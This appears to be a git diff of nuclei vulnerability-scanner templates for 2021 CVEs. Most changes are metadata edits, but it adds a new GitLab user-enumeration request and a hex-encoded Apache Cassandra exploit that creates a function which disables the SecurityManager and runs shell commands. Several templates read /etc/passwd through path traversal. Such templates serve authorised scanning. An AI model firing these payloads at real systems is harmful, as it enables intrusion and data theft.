@ -1,11 +1,14 @@
id: CVE-2021-41648
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
name: PuneethReddyHC action.php SQL Injection
author: daffainfo
severity: high
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41648
description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference:
- https://github.com/MobiusBinary/CVE-2021-41648
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -38,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

11
cves/2021/CVE-2021-41649.yaml
View File

@ -1,11 +1,14 @@
id: CVE-2021-41649
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection
author: daffainfo
severity: critical
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41649
description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference:
- https://github.com/MobiusBinary/CVE-2021-41649
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -37,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

8
cves/2021/CVE-2021-41653.yaml
View File

@ -2,12 +2,14 @@ id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
author: gy741
severity: critical
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
- https://www.tp-link.com/us/press/security-advisory/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -43,6 +45,8 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/02/27

6
cves/2021/CVE-2021-41773.yaml
View File

@ -4,10 +4,12 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
remediation: Update to Apache HTTP Server 2.4.50 or later.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
@ -45,3 +47,5 @@ requests:
name: RCE
words:
- "CVE-2021-41773-POC"
# Enhanced by mp on 2022/02/27

4
cves/2021/CVE-2021-41826.yaml
View File

@ -4,7 +4,7 @@ info:
name: PlaceOS 1.2109.1 - Open Redirection
author: geeknik
severity: medium
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
reference:
- https://github.com/PlaceOS/auth/issues/36
- https://www.exploit-db.com/exploits/50359
@ -34,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
# Enhanced by mp on 2022/02/27

7
cves/2021/CVE-2021-41878.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-41878
info:
name: i-Panel Administration System - Reflected XSS
name: i-Panel Administration System - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
classification:
@ -35,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/02/27

52
cves/2021/CVE-2021-4191.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2021-4191
info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-4191
cwe-id: CWE-359
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
requests:
- raw:
- |
POST /api/graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: */*
Origin: {{RootURL}}
Referer: {{RootURL}}/-/graphql-explorer
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"data"'
- '"users"'
- '"nodes"'
- '"id"'
- 'gid://'
condition: and
- type: status
status:
- 200
extractors:
- type: json
json:
- '.data.users.nodes[].username'
# Enhanced by mp on 2022/03/07

8
cves/2021/CVE-2021-41951.yaml
View File

@ -1,9 +1,9 @@
id: CVE-2021-41951
info:
name: Resourcespace - Reflected XSS
name: Resourcespace - Reflected Cross-Site Scripting
author: coldfish
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected Cross-Site Scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
severity: medium
tags: cve,cve2021,xss,resourcespace
reference:
@ -33,4 +33,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/27

6
cves/2021/CVE-2021-42013.yaml
View File

@ -4,8 +4,10 @@ info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
severity: critical
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- https://twitter.com/itsecurityco/status/1446136957117943815
@ -44,3 +46,5 @@ requests:
name: RCE
words:
- "CVE-2021-42013"
# Enhanced by mp on 2022/02/27

14
cves/2021/CVE-2021-42258.yaml
View File

@ -1,17 +1,11 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
name: BillQuick Web Suite SQL Injection
author: dwisiswant0
severity: critical
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
@ -34,7 +28,7 @@ requests:
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
@ -67,3 +61,5 @@ requests:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"
# Enhanced by mp on 2022/02/27

8
cves/2021/CVE-2021-42551.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-42551
info:
name: NetBiblio WebOPAC - Reflected XSS
name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
author: compr00t
severity: medium
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected Cross-Site Scripting vulnerability in its Wikipedia modul through /NetBiblio/search/shortview via the searchTerm parameter.
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42551
- https://www.redguard.ch/advisories/netbiblio_webopac.txt
- https://www.cve.org/CVERecord?id=CVE-2021-42551
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -45,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/27

8
cves/2021/CVE-2021-42565.yaml
View File

@ -2,11 +2,11 @@ id: CVE-2021-42565
info:
author: madrobot
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
- https://nvd.nist.gov/vuln/detail/CVE-2021-42565
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -37,3 +37,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/27

7
cves/2021/CVE-2021-42566.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-42566
info:
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42566
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
classification:
@ -37,3 +38,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-42567.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-42567
info:
name: Apereo CAS Reflected XSS
name: Apereo CAS Reflected Cross-Site Scripting
author: pdteam
severity: medium
description: Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
reference:
- https://apereo.github.io/2021/10/18/restvuln/
- https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 401
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43062.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-43062
info:
name: Fortinet Fortimail 7.0.1 - Reflected XSS
name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting
author: ajaysenr
severity: medium
description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-43062
- https://www.fortiguard.com/psirt/FG-IR-21-185
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43287.yaml
View File

@ -4,6 +4,8 @@ info:
name: Pre-Auth Takeover of Build Pipelines in GoCD
author: dhiyaneshDk
severity: critical
description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
remediation: Upgrade to version v21.3.0. or later.
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
@ -11,6 +13,8 @@ info:
tags: cve,cve2021,go,lfi,gocd,takeover
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
classification:
cve-id: CVE-2021-43287
requests:
- method: GET
@ -26,3 +30,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43495.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-43495
info:
name: AlquistManager lfi
name: AlquistManager Local File Inclusion
author: pikpikcu
severity: high
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
reference:
- https://github.com/AlquistManager/alquist/issues/43
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
@ -25,3 +25,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/02/28

4
cves/2021/CVE-2021-43496.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-43496
info:
name: Clustering LFI
name: Clustering Local File Inclusion
author: Evan Rubinstein
severity: high
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
@ -25,3 +25,5 @@ requests:
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-43778.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
author: cckuailong
severity: critical
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
reference:
- https://github.com/AK-blank/CVE-2021-43778
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
@ -28,3 +29,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43798.yaml
View File

@ -4,8 +4,8 @@ info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: Grafana is an open-source analytics and monitoring application. Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
@ -34,4 +34,4 @@ requests:
status:
- 200
# Enhanced by cs on 2022/02/18
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-43810.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-43810
info:
name: Admidio - Reflected XSS
name: Admidio - Reflected Cross-Site Scripting
author: gy741
severity: medium
description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
remediation: Upgrade to version 4.0.12 or later.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-44228.yaml
View File

@ -1,11 +1,14 @@
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
@ -68,3 +71,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28

4
cves/2021/CVE-2021-44427.yaml
View File

@ -4,7 +4,7 @@ info:
name: Rosario Student Information System Unauthenticated SQL Injection
author: furkansayim,xShuden
severity: critical
description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
remediation: Upgrade to version 8.1.1 or higher.
reference:
- https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
@ -42,3 +42,5 @@ requests:
part: header
words:
- "RosarioSIS="
# Enhanced by mp on 2022/02/28

59
cves/2021/CVE-2021-44521.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2021-44521
info:
name: Apache Cassandra Load UDF RCE
author: Y4er
description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE."
severity: critical
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
- https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.10
cve-id: CVE-2021-44521
cwe-id: CWE-94
network:
- inputs:
- data: "050000000500000000"
read: 1024
type: hex
- data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
read: 1024
type: hex
- data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
read: 1024
type: hex
- data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
read: 1024
type: hex
- data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
read: 1024
type: hex
- data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
read: 1024
type: hex
- data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
type: hex
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:9042"
matchers:
- type: word
part: raw
words:
- "123123"
# Enhanced by mp on 2022/03/07

2
cves/2021/CVE-2021-44528.yaml
View File

@ -35,3 +35,5 @@ requests:
- 302
- 307
- 308
# Enhanced by mp on 2022/02/28

2
cves/2021/CVE-2021-44848.yaml
View File

@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-45043.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-45043
info:
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
author: Momen Eldawakhly,Evan Rubinstein
severity: high
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-45043
- https://www.exploit-db.com/exploits/50588
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-45046.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-45046
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: ImNightmaree
severity: critical
description: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
- https://twitter.com/marcioalm/status/1471740771581652995
@ -64,3 +64,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28

8
cves/2021/CVE-2021-45092.yaml
View File

@ -4,7 +4,7 @@ info:
name: Thinfinity Iframe Injection
author: danielmofer
severity: critical
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
@ -26,4 +26,8 @@ requests:
regex:
- ".*vpath.*"
- "thinfinity"
condition: and
condition: and
# Enhanced by mp on 2022/02/28
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-45232.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard api unauth access
